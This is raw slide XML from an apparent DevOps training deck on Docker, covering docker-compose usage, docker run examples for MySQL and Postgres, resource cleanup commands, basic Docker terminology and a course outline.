                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>docker-compose up --build -d</a:t>
            </a:r>
            <a:endParaRPr sz="1853">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1853">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>docker-compose ps</a:t>
            </a:r>
            <a:endParaRPr sz="1853">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="852"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1853">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>docker-compose down</a:t>
            </a:r>
            <a:endParaRPr sz="1853">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="852"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1753">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1443">
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>docker run --name some-mysql -e MYSQL_ROOT_PASSWORD=my-secret-pw -p 3306:3306 -d mysql:tag</a:t>
            </a:r>
            <a:endParaRPr sz="1443">
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" sz="1443">
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1443">
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>docker run --name postgres-db -e POSTGRES_PASSWORD=mysecretpassword -p 5432:5432 -d postgres</a:t>
            </a:r>
            <a:endParaRPr sz="1443">
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1650"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="852"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="105000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="852"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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311"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3292950" y="3604775"/>
            <a:ext cx="2558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620">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Clean Ups</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3620">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1916" name="Google Shape;1916;p311"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3067800" y="521700"/>
            <a:ext cx="3008375" cy="3008375"/>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312"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259525" y="224150"/>
            <a:ext cx="8647200" cy="4659900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="900"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Clean up space used by Docker</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>It is recommended to use the Docker command to clean up unused containers. Container, networks, images, and the build cache can be cleaned up by executing:</a:t>
            </a:r>
            <a:endParaRPr sz="2350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="190500" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker system prune -a</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2350">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Additionally, you can also remove unused volumes by executing:</a:t>
            </a:r>
            <a:endParaRPr sz="2350">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>olume rm $(docker volume ls -q)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker volume prune</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="190500" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="330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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2500"/>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313"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259525" y="930500"/>
            <a:ext cx="8647200" cy="3953700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker image rmi -f $(docker image ls -q)</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ocker container rm -f $(docker ps -aq)</a:t>
            </a:r>
            <a:endParaRPr sz="3750">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker volume rm $(docker volume ls -q)</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker volume prune</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker system prune -a</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="190500" marR="190500" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1927" name="Google Shape;1927;p313"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390975" y="141325"/>
            <a:ext cx="80496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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Cleanup</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accen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53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2152" l="0" r="5802" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="54500" y="0"/>
            <a:ext cx="8803416" cy="5143500"/>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3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Docker Terminology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1933" name="Google Shape;1933;p3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Docker Image</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Docker Container</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Daemon</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Registry</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Docker Client</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1938" name="Google Shape;1938;p315"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="2713" l="5122" r="5639" t="3398"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="825625" y="821275"/>
            <a:ext cx="7492742" cy="4183450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1939" name="Google Shape;1939;p315"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6982075" y="298375"/>
            <a:ext cx="1834451" cy="522900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1940" name="Google Shape;1940;p315"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2621450" y="88125"/>
            <a:ext cx="3641700" cy="6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100">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Learn DevOps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226350" y="1554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820">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Course Outline</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3820">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1946" name="Google Shape;1946;p316"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="651925"/>
            <a:ext cx="8520600" cy="4302300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-346075" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="110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Week 1 - Linux Administrations</a:t>
            </a:r>
